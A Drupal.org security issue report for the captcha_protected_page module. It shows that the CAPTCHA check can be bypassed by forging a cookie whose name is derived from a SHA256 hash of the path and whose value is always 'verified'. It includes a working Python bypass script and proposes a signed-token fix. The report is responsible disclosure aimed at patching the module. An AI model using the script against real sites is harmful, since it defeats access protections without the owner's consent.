Problem/Motivation

CAPTCHA protection can be completely bypassed by forging the verification cookie. The cookie uses a predictable name (captcha_protected_ + base64url(SHA256(path))) and static value (verified), which allows attackers to skip CAPTCHA verification entirely.

Steps to reproduce

  1. Compute cookie name: captcha_protected_ + base64url(SHA256(path))
  2. Set cookie: captcha_protected_<hash>=verified
  3. Access protected page → Returns 200 without CAPTCHA

Example bypass script:

#!/usr/bin/env python3
import sys
import hashlib
import base64
from urllib.parse import urlparse
import requests

if len(sys.argv) <= 1: raise ValueError("Usage: python3 bypass.py <url>")
url = sys.argv[1]
path = urlparse(url).path or '/'
h = hashlib.sha256(path.encode()).digest()
cookie_name = 'captcha_protected_' + base64.urlsafe_b64encode(h).decode().rstrip('=')

print(requests.get(url, cookies={cookie_name: 'verified'}, allow_redirects=False).text)

Proposed resolution

Replace the static cookie value with a cryptographically signed token: 

$token = Crypt::hmacBase64($path . time(), Settings::getHashSalt());

Alternatively, use server-side session validation instead of relying solely on cookies.

Location: src/Form/CaptchaForm.php line 161-163

Issue fork captcha_protected_page-3560604

Command icon Show commands

Start within a Git clone of the project using the version control instructions.

Or, if you do not have SSH keys set up on git.drupalcode.org:

  • 1.0.x Comparecompare
About issue forks

Comments

lovasoa created an issue. See original summary.

lovasoa’s picture

lovasoa commented
Issue summary: View changes
lovasoa’s picture

lovasoa commented
Issue summary: View changes
lovasoa’s picture

lovasoa commented
Issue summary: View changes